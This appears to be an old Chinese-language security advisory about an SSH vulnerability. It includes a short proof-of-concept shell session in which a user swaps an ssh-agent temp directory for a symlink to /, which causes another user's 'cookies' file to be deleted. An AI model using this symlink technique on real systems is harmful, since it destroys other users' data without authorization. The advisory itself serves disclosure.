涉及程序：
SSH
   
描述：
SSH 允许删除其它用户文件漏洞
   
详细：
SSH 是一个提供安全加密通信方式的工具，近日发现它存在漏洞。如果使用了 COOKIES，攻击者便能删除其它用户的任何文件。

以下代码仅仅用来测试和研究这个漏洞，如果您将其用于不正当的途径请后果自负


/home/zen/.netscape/cookies
sample exploit:-
[root@clarity /root]# touch /cookies;ls /cookies
/cookies
[root@clarity /root]# ssh zen@localhost
zen@localhost's password:
Last login: Mon Jun 4 20:22:39 2001 from localhost.local
Linux clarity 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
[zen@clarity zen]$ rm -r /tmp/ssh-XXW9hNY9/; ln -s / /tmp/ssh-XXW9hNY9
[zen@clarity zen]$ logout
Connection to localhost closed.
[root@clarity /root]# ls /cookies
/bin/ls: /cookies: No such file or directory

--zen-parse

   
解决方案：
不要采用 COOKIES
　　　　　　
--------------------next---------------------